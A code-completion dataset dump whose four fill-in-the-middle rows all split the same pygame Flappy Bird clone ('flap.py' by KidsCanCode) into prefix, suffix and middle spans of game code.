file_name large_stringlengths 4 140 | prefix large_stringlengths 0 39k | suffix large_stringlengths 0 36.1k | middle large_stringlengths 0 29.4k | fim_type large_stringclasses 4
values |
|---|---|---|---|---|
flap.py | # Flap
# KidsCanCode 2014
# Flappy bird in pygame
# For educational purposes only
# Art from http://lanica.co/flappy-clone/
# Music from opengameart.org (http://opengameart.org/content/cheerful-1-choro-bavario-happy-loop)
# Copyright 2009 MSTR "Choro Bavario" <http://www.jamendo.com/en/artist/349242/mstr>
# Copyright 2012 Iwan Gabovitch "Choro Bavario (happy loop)" (simple editing to make it loop)
# TODO:
# combine sprites into one spritesheet
import pygame
import sys
from os import path
import random
# define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
LIGHTBLUE = (0, 155, 155)
BGCOLOR = LIGHTBLUE
# basic constants for your game options
WIDTH = 480
HEIGHT = 320
FPS = 30
# tweak this to change how quickly the bird falls
GRAVITY = 1
# how big the gaps between the pipes are
GAP = 100
# how frequently the pipes spawn (sec)
FREQ = 2
# how fast the bird flies at the pipes
PIPE_SPEED = 3
# how powerful is a flap?
FLAP_SPEED = 15
# set up asset folders
game_dir = path.dirname(__file__)
img_dir = path.join(game_dir, 'img')
snd_dir = path.join(game_dir, 'snd')
class SpriteSheet:
"""Utility class to load and parse spritesheets"""
def __init__(self, filename):
self.sprite_sheet = pygame.image.load(filename).convert()
def get_image(self, x, y, width, height):
# grab an image out of a larger spritesheet
image = pygame.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))
image.set_colorkey([0, 0, 0])
return image
class Bird(pygame.sprite.Sprite):
# player controlled bird, can only flap
width = 36
height = 24
def __init__(self):
# when you make a Pygame Sprite object, you have to call the
# Sprite init function
pygame.sprite.Sprite.__init__(self)
self.alive = True
self.speed_x = 0
self.speed_y = 0
self.flap_snd = pygame.mixer.Sound(path.join(snd_dir, "bird_flap.wav"))
self.flap_snd.set_volume(0.2)
self.frames = []
sprite_sheet = SpriteSheet(path.join(img_dir, "bird_sprites.png"))
image = sprite_sheet.get_image(3, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.image_dead = pygame.transform.rotate(image, -90)
image = sprite_sheet.get_image(59, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
image = sprite_sheet.get_image(115, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.index = 0
self.image = self.frames[self.index]
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start in the middle of the screen
self.rect.centerx = WIDTH / 2
self.rect.y = HEIGHT / 2
def update(self):
# gravity pulls downward
self.speed_y += gravity
# move
self.rect.x += self.speed_x
self.rect.y += self.speed_y
if self.alive:
# animate
self.index += 1
if self.index >= len(self.frames):
self.index = 0
self.image = self.frames[self.index]
else:
self.image = self.image_dead
# stop at the top/bottom
if self.rect.top < 0:
self.rect.top = 0
self.speed_y = 0
if self.rect.bottom > HEIGHT-50:
self.rect.bottom = HEIGHT-50
self.speed_y = 0
def move(self):
# player hit SPACEBAR
if not self.alive:
return
self.speed_y -= FLAP_SPEED
self.flap_snd.play()
class Pipe(pygame.sprite.Sprite):
# pipe segment class
speed_x = -PIPE_SPEED
width = 36
def __init__(self, loc, y):
# loc = upper or lower
# y = where to place it
pygame.sprite.Sprite.__init__(self)
sprite_sheet = SpriteSheet(path.join(img_dir, "pipes.png"))
if loc == 'u':
self.image = sprite_sheet.get_image(2, 8, 52, 320)
else:
self.image = sprite_sheet.get_image(58, 8, 52, 320)
self.image.set_colorkey(BLACK)
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start offscreen to the right
self.rect.x = WIDTH + 50
if loc == 'u':
self.rect.bottom = y
else:
self.rect.top = y
# has the bird passed this pipe?
self.passed = False
def update(self):
# move
self.rect.x += self.speed_x
def offscreen(self):
# test to see if the pipe has moved offscreen
if self.rect.right < 0:
return True
else:
return False
def new_pipe():
# create a new pair of pipes (upper and lower)
y = random.randrange(30, HEIGHT-50-GAP)
pipe_u = Pipe('u', y)
pipe_l = Pipe('l', y + GAP)
return pipe_u, pipe_l
def draw_background():
# draw the background (tiled)
|
def draw_ground():
# draw the ground tiles, moving at the same speed as pipes
for image in ground_list:
image.x -= PIPE_SPEED
if image.right <= 0:
# if the image has completely moved off the screen, move it to the right
image.left = 2 * ground.get_width() + image.right
screen.blit(ground, image)
def draw_text(text, size, x, y):
# utility function to draw text at a given location
font_name = pygame.font.match_font('arial')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
screen.blit(text_surface, text_rect)
def show_go_image():
go_rect.midtop = (WIDTH/2, HEIGHT/2)
screen.blit(go_image, go_rect)
def show_ready_image():
ready_rect.midtop = (WIDTH/2, HEIGHT*2/3)
screen.blit(ready_image, ready_rect)
def load_score_images():
sprite_sheet = SpriteSheet(path.join(img_dir, 'numbers.png'))
score_images = []
image = sprite_sheet.get_image(114, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(114, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 45, 24, 36)
score_images.append(image)
return score_images
def show_score(score):
# show the score using the score images
# draw_text(str(int(score)), 22, WIDTH/2, 10)
digits = [int(c) for c in str(score)]
for i, digit in enumerate(digits):
img = score_images[digit]
img_rect = img.get_rect()
img_rect.y = 5
img_rect.x = i * img_rect.width + 5
screen.blit(img, img_rect)
# initialize pygame
pygame.init()
# initialize sound
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Flap")
try:
pygame.mixer.music.load(path.join(snd_dir, "Choro_bavario_loop.ogg"))
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play(loops=-1)
except:
print("Can't load music.")
# background
background = pygame.image.load(path.join(img_dir, "background.png")).convert()
background_rect = background.get_rect()
background_rect.bottom = HEIGHT
background_rect.left = 0
# load some other images we need
go_image = pygame.image.load(path.join(img_dir, "gameover.png")).convert()
go_image.set_colorkey(BLACK)
go_rect = go_image.get_rect()
ready_image = pygame.image.load(path.join(img_dir, "getready.png")).convert()
ready_image.set_colorkey(BLACK)
ready_rect = ready_image.get_rect()
score_images = load_score_images()
# load the ground tile images
ground_list = []
ground = pygame.image.load(path.join(img_dir, "ground.png")).convert()
# three tiles (increase for v. large screen sizes)
for i in range(3):
image_rect = ground.get_rect()
image_rect.y = HEIGHT-50
image_rect.x = i * ground.get_width()
ground_list.append(image_rect)
while True:
clock = pygame.time.Clock()
# timer to generate new pipes
pygame.time.set_timer(pygame.USEREVENT+1, int(FREQ*1000))
# groups to hold sprites (all sprites & a group of just the pipes)
active_sprite_list = pygame.sprite.Group()
pipe_sprite_list = pygame.sprite.Group()
# create the player object
player = Bird()
active_sprite_list.add(player)
gravity = 0
score = 0
running = True
clicked = False
while running:
clock.tick(FPS)
if clicked:
gravity = GRAVITY
# check for events
for event in pygame.event.get():
# this one checks for the window being closed
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
# # every FREQ seconds, make a new pipe
elif event.type == pygame.USEREVENT+1:
upper, lower = new_pipe()
active_sprite_list.add(upper)
pipe_sprite_list.add(upper)
active_sprite_list.add(lower)
pipe_sprite_list.add(lower)
if not clicked:
clicked = True
# now check for keypresses
elif event.type == pygame.KEYDOWN:
clicked = True
# this one quits if the player presses Esc
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
if event.key == pygame.K_SPACE:
player.move()
elif event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
player.move()
##### Game logic goes here #########
# filter out old pipes
for pipe in pipe_sprite_list:
if pipe.offscreen():
active_sprite_list.remove(pipe)
pipe_sprite_list.remove(pipe)
elif pipe.rect.right < player.rect.x and not pipe.passed:
# if the pipe is past the player and hasn't yet been marked
score += 0.5
pipe.passed = True
# check for collisions
hit_list = pygame.sprite.spritecollide(player, pipe_sprite_list, False,
pygame.sprite.collide_mask)
if len(hit_list) > 0:
# too bad! stop flapping and move to the left
player.alive = False
player.speed_x = -3
if player.rect.left <= 0:
# game ends when the bird goes offscreen
running = False
##### Draw/update screen #########
draw_background()
active_sprite_list.update()
active_sprite_list.draw(screen)
draw_ground()
if not player.alive:
show_go_image()
if not clicked:
show_ready_image()
show_score(int(score))
# after drawing, flip the display
pygame.display.flip()
| background_rect.bottom = HEIGHT + 20
background_rect.left = 0
screen.blit(background, background_rect)
if background_rect.width < WIDTH:
background_rect.left = background_rect.width
screen.blit(background, background_rect) | identifier_body |
flap.py | # Flap
# KidsCanCode 2014
# Flappy bird in pygame
# For educational purposes only
# Art from http://lanica.co/flappy-clone/
# Music from opengameart.org (http://opengameart.org/content/cheerful-1-choro-bavario-happy-loop)
# Copyright 2009 MSTR "Choro Bavario" <http://www.jamendo.com/en/artist/349242/mstr>
# Copyright 2012 Iwan Gabovitch "Choro Bavario (happy loop)" (simple editing to make it loop)
# TODO:
# combine sprites into one spritesheet
import pygame
import sys
from os import path
import random
# define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
LIGHTBLUE = (0, 155, 155)
BGCOLOR = LIGHTBLUE
# basic constants for your game options
WIDTH = 480
HEIGHT = 320
FPS = 30
# tweak this to change how quickly the bird falls
GRAVITY = 1
# how big the gaps between the pipes are
GAP = 100
# how frequently the pipes spawn (sec)
FREQ = 2
# how fast the bird flies at the pipes
PIPE_SPEED = 3
# how powerful is a flap?
FLAP_SPEED = 15
# set up asset folders
game_dir = path.dirname(__file__)
img_dir = path.join(game_dir, 'img')
snd_dir = path.join(game_dir, 'snd')
class SpriteSheet:
"""Utility class to load and parse spritesheets"""
def __init__(self, filename):
self.sprite_sheet = pygame.image.load(filename).convert()
def get_image(self, x, y, width, height):
# grab an image out of a larger spritesheet
image = pygame.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))
image.set_colorkey([0, 0, 0])
return image
class Bird(pygame.sprite.Sprite):
# player controlled bird, can only flap
width = 36
height = 24
def __init__(self):
# when you make a Pygame Sprite object, you have to call the
# Sprite init function
pygame.sprite.Sprite.__init__(self)
self.alive = True
self.speed_x = 0
self.speed_y = 0
self.flap_snd = pygame.mixer.Sound(path.join(snd_dir, "bird_flap.wav"))
self.flap_snd.set_volume(0.2)
self.frames = []
sprite_sheet = SpriteSheet(path.join(img_dir, "bird_sprites.png"))
image = sprite_sheet.get_image(3, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.image_dead = pygame.transform.rotate(image, -90)
image = sprite_sheet.get_image(59, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
image = sprite_sheet.get_image(115, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.index = 0
self.image = self.frames[self.index]
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start in the middle of the screen
self.rect.centerx = WIDTH / 2
self.rect.y = HEIGHT / 2
def update(self):
# gravity pulls downward
self.speed_y += gravity
# move
self.rect.x += self.speed_x
self.rect.y += self.speed_y
if self.alive:
# animate
self.index += 1
if self.index >= len(self.frames):
self.index = 0
self.image = self.frames[self.index]
else:
self.image = self.image_dead
# stop at the top/bottom
if self.rect.top < 0:
self.rect.top = 0
self.speed_y = 0
if self.rect.bottom > HEIGHT-50:
self.rect.bottom = HEIGHT-50
self.speed_y = 0
def move(self):
# player hit SPACEBAR
if not self.alive:
return
self.speed_y -= FLAP_SPEED
self.flap_snd.play()
class Pipe(pygame.sprite.Sprite):
# pipe segment class
speed_x = -PIPE_SPEED
width = 36
def __init__(self, loc, y):
# loc = upper or lower
# y = where to place it
pygame.sprite.Sprite.__init__(self)
sprite_sheet = SpriteSheet(path.join(img_dir, "pipes.png"))
if loc == 'u':
self.image = sprite_sheet.get_image(2, 8, 52, 320)
else:
self.image = sprite_sheet.get_image(58, 8, 52, 320)
self.image.set_colorkey(BLACK)
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start offscreen to the right
self.rect.x = WIDTH + 50
if loc == 'u':
|
else:
self.rect.top = y
# has the bird passed this pipe?
self.passed = False
def update(self):
# move
self.rect.x += self.speed_x
def offscreen(self):
# test to see if the pipe has moved offscreen
if self.rect.right < 0:
return True
else:
return False
def new_pipe():
# create a new pair of pipes (upper and lower)
y = random.randrange(30, HEIGHT-50-GAP)
pipe_u = Pipe('u', y)
pipe_l = Pipe('l', y + GAP)
return pipe_u, pipe_l
def draw_background():
# draw the background (tiled)
background_rect.bottom = HEIGHT + 20
background_rect.left = 0
screen.blit(background, background_rect)
if background_rect.width < WIDTH:
background_rect.left = background_rect.width
screen.blit(background, background_rect)
def draw_ground():
# draw the ground tiles, moving at the same speed as pipes
for image in ground_list:
image.x -= PIPE_SPEED
if image.right <= 0:
# if the image has completely moved off the screen, move it to the right
image.left = 2 * ground.get_width() + image.right
screen.blit(ground, image)
def draw_text(text, size, x, y):
# utility function to draw text at a given location
font_name = pygame.font.match_font('arial')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
screen.blit(text_surface, text_rect)
def show_go_image():
go_rect.midtop = (WIDTH/2, HEIGHT/2)
screen.blit(go_image, go_rect)
def show_ready_image():
ready_rect.midtop = (WIDTH/2, HEIGHT*2/3)
screen.blit(ready_image, ready_rect)
def load_score_images():
sprite_sheet = SpriteSheet(path.join(img_dir, 'numbers.png'))
score_images = []
image = sprite_sheet.get_image(114, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(114, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 45, 24, 36)
score_images.append(image)
return score_images
def show_score(score):
# show the score using the score images
# draw_text(str(int(score)), 22, WIDTH/2, 10)
digits = [int(c) for c in str(score)]
for i, digit in enumerate(digits):
img = score_images[digit]
img_rect = img.get_rect()
img_rect.y = 5
img_rect.x = i * img_rect.width + 5
screen.blit(img, img_rect)
# initialize pygame
pygame.init()
# initialize sound
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Flap")
try:
pygame.mixer.music.load(path.join(snd_dir, "Choro_bavario_loop.ogg"))
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play(loops=-1)
except:
print("Can't load music.")
# background
background = pygame.image.load(path.join(img_dir, "background.png")).convert()
background_rect = background.get_rect()
background_rect.bottom = HEIGHT
background_rect.left = 0
# load some other images we need
go_image = pygame.image.load(path.join(img_dir, "gameover.png")).convert()
go_image.set_colorkey(BLACK)
go_rect = go_image.get_rect()
ready_image = pygame.image.load(path.join(img_dir, "getready.png")).convert()
ready_image.set_colorkey(BLACK)
ready_rect = ready_image.get_rect()
score_images = load_score_images()
# load the ground tile images
ground_list = []
ground = pygame.image.load(path.join(img_dir, "ground.png")).convert()
# three tiles (increase for v. large screen sizes)
for i in range(3):
image_rect = ground.get_rect()
image_rect.y = HEIGHT-50
image_rect.x = i * ground.get_width()
ground_list.append(image_rect)
while True:
clock = pygame.time.Clock()
# timer to generate new pipes
pygame.time.set_timer(pygame.USEREVENT+1, int(FREQ*1000))
# groups to hold sprites (all sprites & a group of just the pipes)
active_sprite_list = pygame.sprite.Group()
pipe_sprite_list = pygame.sprite.Group()
# create the player object
player = Bird()
active_sprite_list.add(player)
gravity = 0
score = 0
running = True
clicked = False
while running:
clock.tick(FPS)
if clicked:
gravity = GRAVITY
# check for events
for event in pygame.event.get():
# this one checks for the window being closed
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
# # every FREQ seconds, make a new pipe
elif event.type == pygame.USEREVENT+1:
upper, lower = new_pipe()
active_sprite_list.add(upper)
pipe_sprite_list.add(upper)
active_sprite_list.add(lower)
pipe_sprite_list.add(lower)
if not clicked:
clicked = True
# now check for keypresses
elif event.type == pygame.KEYDOWN:
clicked = True
# this one quits if the player presses Esc
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
if event.key == pygame.K_SPACE:
player.move()
elif event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
player.move()
##### Game logic goes here #########
# filter out old pipes
for pipe in pipe_sprite_list:
if pipe.offscreen():
active_sprite_list.remove(pipe)
pipe_sprite_list.remove(pipe)
elif pipe.rect.right < player.rect.x and not pipe.passed:
# if the pipe is past the player and hasn't yet been marked
score += 0.5
pipe.passed = True
# check for collisions
hit_list = pygame.sprite.spritecollide(player, pipe_sprite_list, False,
pygame.sprite.collide_mask)
if len(hit_list) > 0:
# too bad! stop flapping and move to the left
player.alive = False
player.speed_x = -3
if player.rect.left <= 0:
# game ends when the bird goes offscreen
running = False
##### Draw/update screen #########
draw_background()
active_sprite_list.update()
active_sprite_list.draw(screen)
draw_ground()
if not player.alive:
show_go_image()
if not clicked:
show_ready_image()
show_score(int(score))
# after drawing, flip the display
pygame.display.flip()
| self.rect.bottom = y | conditional_block |
flap.py | # Flap
# KidsCanCode 2014
# Flappy bird in pygame
# For educational purposes only
# Art from http://lanica.co/flappy-clone/
# Music from opengameart.org (http://opengameart.org/content/cheerful-1-choro-bavario-happy-loop)
# Copyright 2009 MSTR "Choro Bavario" <http://www.jamendo.com/en/artist/349242/mstr>
# Copyright 2012 Iwan Gabovitch "Choro Bavario (happy loop)" (simple editing to make it loop)
# TODO:
# combine sprites into one spritesheet
import pygame
import sys
from os import path
import random
# define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
LIGHTBLUE = (0, 155, 155)
BGCOLOR = LIGHTBLUE
# basic constants for your game options
WIDTH = 480
HEIGHT = 320
FPS = 30
# tweak this to change how quickly the bird falls
GRAVITY = 1
# how big the gaps between the pipes are
GAP = 100
# how frequently the pipes spawn (sec)
FREQ = 2
# how fast the bird flies at the pipes
PIPE_SPEED = 3
# how powerful is a flap?
FLAP_SPEED = 15
# set up asset folders
game_dir = path.dirname(__file__)
img_dir = path.join(game_dir, 'img')
snd_dir = path.join(game_dir, 'snd')
class SpriteSheet:
"""Utility class to load and parse spritesheets"""
def __init__(self, filename):
self.sprite_sheet = pygame.image.load(filename).convert()
def get_image(self, x, y, width, height):
# grab an image out of a larger spritesheet
image = pygame.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))
image.set_colorkey([0, 0, 0])
return image
class Bird(pygame.sprite.Sprite):
# player controlled bird, can only flap
width = 36
height = 24
def __init__(self):
# when you make a Pygame Sprite object, you have to call the
# Sprite init function
pygame.sprite.Sprite.__init__(self)
self.alive = True
self.speed_x = 0
self.speed_y = 0
self.flap_snd = pygame.mixer.Sound(path.join(snd_dir, "bird_flap.wav"))
self.flap_snd.set_volume(0.2)
self.frames = []
sprite_sheet = SpriteSheet(path.join(img_dir, "bird_sprites.png"))
image = sprite_sheet.get_image(3, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.image_dead = pygame.transform.rotate(image, -90)
image = sprite_sheet.get_image(59, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
image = sprite_sheet.get_image(115, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.index = 0
self.image = self.frames[self.index]
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start in the middle of the screen
self.rect.centerx = WIDTH / 2
self.rect.y = HEIGHT / 2
def | (self):
# gravity pulls downward
self.speed_y += gravity
# move
self.rect.x += self.speed_x
self.rect.y += self.speed_y
if self.alive:
# animate
self.index += 1
if self.index >= len(self.frames):
self.index = 0
self.image = self.frames[self.index]
else:
self.image = self.image_dead
# stop at the top/bottom
if self.rect.top < 0:
self.rect.top = 0
self.speed_y = 0
if self.rect.bottom > HEIGHT-50:
self.rect.bottom = HEIGHT-50
self.speed_y = 0
def move(self):
# player hit SPACEBAR
if not self.alive:
return
self.speed_y -= FLAP_SPEED
self.flap_snd.play()
class Pipe(pygame.sprite.Sprite):
# pipe segment class
speed_x = -PIPE_SPEED
width = 36
def __init__(self, loc, y):
# loc = upper or lower
# y = where to place it
pygame.sprite.Sprite.__init__(self)
sprite_sheet = SpriteSheet(path.join(img_dir, "pipes.png"))
if loc == 'u':
self.image = sprite_sheet.get_image(2, 8, 52, 320)
else:
self.image = sprite_sheet.get_image(58, 8, 52, 320)
self.image.set_colorkey(BLACK)
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start offscreen to the right
self.rect.x = WIDTH + 50
if loc == 'u':
self.rect.bottom = y
else:
self.rect.top = y
# has the bird passed this pipe?
self.passed = False
def update(self):
# move
self.rect.x += self.speed_x
def offscreen(self):
# test to see if the pipe has moved offscreen
if self.rect.right < 0:
return True
else:
return False
def new_pipe():
# create a new pair of pipes (upper and lower)
y = random.randrange(30, HEIGHT-50-GAP)
pipe_u = Pipe('u', y)
pipe_l = Pipe('l', y + GAP)
return pipe_u, pipe_l
def draw_background():
# draw the background (tiled)
background_rect.bottom = HEIGHT + 20
background_rect.left = 0
screen.blit(background, background_rect)
if background_rect.width < WIDTH:
background_rect.left = background_rect.width
screen.blit(background, background_rect)
def draw_ground():
# draw the ground tiles, moving at the same speed as pipes
for image in ground_list:
image.x -= PIPE_SPEED
if image.right <= 0:
# if the image has completely moved off the screen, move it to the right
image.left = 2 * ground.get_width() + image.right
screen.blit(ground, image)
def draw_text(text, size, x, y):
# utility function to draw text at a given location
font_name = pygame.font.match_font('arial')
font = pygame.font.Font(font_name, size)
text_surface = font.render(text, True, WHITE)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
screen.blit(text_surface, text_rect)
def show_go_image():
go_rect.midtop = (WIDTH/2, HEIGHT/2)
screen.blit(go_image, go_rect)
def show_ready_image():
ready_rect.midtop = (WIDTH/2, HEIGHT*2/3)
screen.blit(ready_image, ready_rect)
def load_score_images():
sprite_sheet = SpriteSheet(path.join(img_dir, 'numbers.png'))
score_images = []
image = sprite_sheet.get_image(114, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(114, 4, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(2, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(30, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(58, 45, 24, 36)
score_images.append(image)
image = sprite_sheet.get_image(86, 45, 24, 36)
score_images.append(image)
return score_images
def show_score(score):
# show the score using the score images
# draw_text(str(int(score)), 22, WIDTH/2, 10)
digits = [int(c) for c in str(score)]
for i, digit in enumerate(digits):
img = score_images[digit]
img_rect = img.get_rect()
img_rect.y = 5
img_rect.x = i * img_rect.width + 5
screen.blit(img, img_rect)
# initialize pygame
pygame.init()
# initialize sound
pygame.mixer.init()
screen = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption("Flap")
try:
pygame.mixer.music.load(path.join(snd_dir, "Choro_bavario_loop.ogg"))
pygame.mixer.music.set_volume(0.5)
pygame.mixer.music.play(loops=-1)
except:
print("Can't load music.")
# background
background = pygame.image.load(path.join(img_dir, "background.png")).convert()
background_rect = background.get_rect()
background_rect.bottom = HEIGHT
background_rect.left = 0
# load some other images we need
go_image = pygame.image.load(path.join(img_dir, "gameover.png")).convert()
go_image.set_colorkey(BLACK)
go_rect = go_image.get_rect()
ready_image = pygame.image.load(path.join(img_dir, "getready.png")).convert()
ready_image.set_colorkey(BLACK)
ready_rect = ready_image.get_rect()
score_images = load_score_images()
# load the ground tile images
ground_list = []
ground = pygame.image.load(path.join(img_dir, "ground.png")).convert()
# three tiles (increase for v. large screen sizes)
for i in range(3):
image_rect = ground.get_rect()
image_rect.y = HEIGHT-50
image_rect.x = i * ground.get_width()
ground_list.append(image_rect)
while True:
clock = pygame.time.Clock()
# timer to generate new pipes
pygame.time.set_timer(pygame.USEREVENT+1, int(FREQ*1000))
# groups to hold sprites (all sprites & a group of just the pipes)
active_sprite_list = pygame.sprite.Group()
pipe_sprite_list = pygame.sprite.Group()
# create the player object
player = Bird()
active_sprite_list.add(player)
gravity = 0
score = 0
running = True
clicked = False
while running:
clock.tick(FPS)
if clicked:
gravity = GRAVITY
# check for events
for event in pygame.event.get():
# this one checks for the window being closed
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
# # every FREQ seconds, make a new pipe
elif event.type == pygame.USEREVENT+1:
upper, lower = new_pipe()
active_sprite_list.add(upper)
pipe_sprite_list.add(upper)
active_sprite_list.add(lower)
pipe_sprite_list.add(lower)
if not clicked:
clicked = True
# now check for keypresses
elif event.type == pygame.KEYDOWN:
clicked = True
# this one quits if the player presses Esc
if event.key == pygame.K_ESCAPE:
pygame.quit()
sys.exit()
if event.key == pygame.K_SPACE:
player.move()
elif event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
player.move()
##### Game logic goes here #########
# filter out old pipes
for pipe in pipe_sprite_list:
if pipe.offscreen():
active_sprite_list.remove(pipe)
pipe_sprite_list.remove(pipe)
elif pipe.rect.right < player.rect.x and not pipe.passed:
# if the pipe is past the player and hasn't yet been marked
score += 0.5
pipe.passed = True
# check for collisions
hit_list = pygame.sprite.spritecollide(player, pipe_sprite_list, False,
pygame.sprite.collide_mask)
if len(hit_list) > 0:
# too bad! stop flapping and move to the left
player.alive = False
player.speed_x = -3
if player.rect.left <= 0:
# game ends when the bird goes offscreen
running = False
##### Draw/update screen #########
draw_background()
active_sprite_list.update()
active_sprite_list.draw(screen)
draw_ground()
if not player.alive:
show_go_image()
if not clicked:
show_ready_image()
show_score(int(score))
# after drawing, flip the display
pygame.display.flip()
| update | identifier_name |
flap.py | # Flap
# KidsCanCode 2014
# Flappy bird in pygame
# For educational purposes only
# Art from http://lanica.co/flappy-clone/
# Music from opengameart.org (http://opengameart.org/content/cheerful-1-choro-bavario-happy-loop)
# Copyright 2009 MSTR "Choro Bavario" <http://www.jamendo.com/en/artist/349242/mstr>
# Copyright 2012 Iwan Gabovitch "Choro Bavario (happy loop)" (simple editing to make it loop)
# TODO:
# combine sprites into one spritesheet
import pygame
import sys
from os import path
import random
# define some colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
LIGHTBLUE = (0, 155, 155)
BGCOLOR = LIGHTBLUE
# basic constants for your game options
WIDTH = 480
HEIGHT = 320
FPS = 30
# tweak this to change how quickly the bird falls
GRAVITY = 1
# how big the gaps between the pipes are
GAP = 100
# how frequently the pipes spawn (sec)
FREQ = 2
# how fast the bird flies at the pipes
PIPE_SPEED = 3
# how powerful is a flap? | FLAP_SPEED = 15
# set up asset folders
game_dir = path.dirname(__file__)
img_dir = path.join(game_dir, 'img')
snd_dir = path.join(game_dir, 'snd')
class SpriteSheet:
"""Utility class to load and parse spritesheets"""
def __init__(self, filename):
self.sprite_sheet = pygame.image.load(filename).convert()
def get_image(self, x, y, width, height):
# grab an image out of a larger spritesheet
image = pygame.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0, 0), (x, y, width, height))
image.set_colorkey([0, 0, 0])
return image
class Bird(pygame.sprite.Sprite):
# player controlled bird, can only flap
width = 36
height = 24
def __init__(self):
# when you make a Pygame Sprite object, you have to call the
# Sprite init function
pygame.sprite.Sprite.__init__(self)
self.alive = True
self.speed_x = 0
self.speed_y = 0
self.flap_snd = pygame.mixer.Sound(path.join(snd_dir, "bird_flap.wav"))
self.flap_snd.set_volume(0.2)
self.frames = []
sprite_sheet = SpriteSheet(path.join(img_dir, "bird_sprites.png"))
image = sprite_sheet.get_image(3, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.image_dead = pygame.transform.rotate(image, -90)
image = sprite_sheet.get_image(59, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
image = sprite_sheet.get_image(115, 7, 34, 24)
image.set_colorkey(BLACK)
self.frames.append(image)
self.index = 0
self.image = self.frames[self.index]
self.mask = pygame.mask.from_surface(self.image)
self.rect = self.image.get_rect()
# start in the middle of the screen
self.rect.centerx = WIDTH / 2
self.rect.y = HEIGHT / 2
def update(self):
# gravity pulls downward
self.speed_y += gravity
# move
self.rect.x += self.speed_x
self.rect.y += self.speed_y
if self.alive:
# animate
self.index += 1
if self.index >= len(self.frames):
self.index = 0
self.image = self.frames[self.index]
else:
self.image = self.image_dead
